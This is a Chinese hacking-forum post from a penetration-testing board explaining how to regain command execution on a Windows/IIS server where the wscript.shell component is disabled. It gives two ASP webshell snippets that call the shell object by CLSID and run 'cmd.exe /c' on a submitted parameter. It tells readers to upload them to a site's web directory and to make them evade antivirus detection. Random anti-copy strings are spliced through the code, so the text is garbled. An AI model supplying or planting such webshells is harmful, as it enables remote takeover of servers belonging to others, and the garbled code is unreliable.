找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 没有wscript.shell组件提权方法
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2456|回复: 0
打印 上一主题 下一主题

没有wscript.shell组件提权方法

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-10-21 09:08:27 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  • 可能有很多人,看到关闭了wscript.shell,就感觉没提权的希望了。就会放弃。4 r2 }) k3 A, ^
  • 一般当闭上面组件时,你上传cmd.exe到上面去是运行不了命令的。运行时会说出错。; }) q- O# ~0 \4 p3 N9 [
  • 要想让运行命令可以试试这种方法,成功率为五五之数。
    + y! l% t$ v( J; l
  • 把下面代码复制:$ U! c) d4 r; ?: g! ^5 M1 e/ U
  • <%
    : U( c0 K) r; b
  • end if
    " S. M' {& X4 T# F- j. R
  • response.write(”")4 A. Y" u, ~$ e2 D* n$ s
  • On Error Resume 1 q% a5 o; y4 k( @4 Z: Y
  • Next: u* r2 H: ]4 y, S$ p
  • response.write oScriptlhn.exec(”cmd.exe /c” & - b; L% O: r+ F1 ?" d8 }
  • request(”c”)).stdout.readall
    4 m( S9 y/ I1 H
  • response.write(”")
    2 u  N5 J- Q( V
  • response.write(”")
    6 C( D* Y+ S. M; v. B
  • response.write(”
    5 T9 |8 B7 R0 m4 o
  • “)
    " W3 b7 A3 e- E
  • response.write(”")' {6 F+ f& V% K+ P% c
  • %>3 ]8 p6 @3 m& q; i
  • 保存为一个asp文件,然后传到网站目录上去3 R4 A1 g  f, y5 \
  • 运行的时候可能会出现两个问题,第一是运行了为什么运行不了命令,这个你可以试着再上传个cmd.exe然后把路径写入上面代码。3 [$ G0 H/ r6 n9 P
  • 我用此成功运行过cacls命令。4 L4 i: V5 v( a
  • 第二那就是运行时出错,可能限制某些代码执行# @6 E  V, U& S
  • 无wscript.shell组件提权又一个方法
    * H" N5 {6 n" c& p' r) `
  • <object runat=server id=oScriptlhn scope=page
    0 J. s- Y0 I& _  q0 d* E$ h9 j

  • % X3 }3 s% {9 ~5 O, ?- ^
  • classid=”clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8″></object>
    . K# Y1 Z5 x7 \1 T+ c8 ]( ]
  • <%if err then%> 1 C' A9 q" k8 V* S$ K3 z: S
  • <object runat=server id=oScriptlhn scope=page - `" c! G; {6 v1 B

  • 9 U4 p6 G* L$ m. w0 \4 d3 l0 |
  • classid=”clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B”></object>
      @: z/ }$ M9 \, J- }, h
  • <%
    # b1 Y! K2 c) Y  I
  • end if 4 j: d* E  d, P2 I
  • response.write(”<textarea readonly cols=80 6 g# V/ J- q' y0 d4 i, E
  • 4 n4 W/ C( o8 P" i5 Q5 e* j) B
  • rows=20>”)
    % N- X( f8 ^, X/ h  b$ r: P0 W
  • On Error Resume Next 8 V$ L" a+ ~; ]) a& M& ?
  • response.write
    % y7 x! m) j4 |9 N% \

  • 6 [5 k; @, u+ r+ g( c/ }2 s
  • oScriptlhn.exec(”cmd.exe /c” & request(”c”)).stdout.readall
    % Y1 g' a5 N3 n! E* j3 T# M, V8 o- q
  • response.write(”</textarea>”) # c6 H5 D2 U+ _* ~( ]" f  \* L% k
  • response.write(”<form
    1 d: c$ i/ C0 v! F% |

  • 0 C. ]/ u" A" e, n. I9 m$ G( L( ?
  • method=’post’>”) 8 K2 t) S2 L  a) f, y- s) z$ k
  • response.write(”<input type=text name=’c' % S% u: d8 p# G) f- H6 @

  • & l2 d$ `& x9 _3 t% d; x0 J
  • size=60><br>”) + x; m! X  r2 |8 d: i6 b
  • response.write(”<input type=submit
    2 n/ ^+ k' K' Y% J
  • + F! n5 C- X9 k
  • value=’执行’></form>”) ' K; j0 j7 ]- p$ c1 ?/ F4 c
  • %>! A- T' A3 P; i% t; m' t
  • 保存为ASP,此代码可能被杀,请注意免杀。6 V8 T/ I% I3 K, z0 M; i$ F& V
  • 原理:有些人把wscript.shell改名了,但是clsid没有变,所以调用这个clsid就等于调用ws组建( Q9 X  i# q) m6 Q" p. O8 }5 v# P
复制代码
request, server, 成功率

相关帖子
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表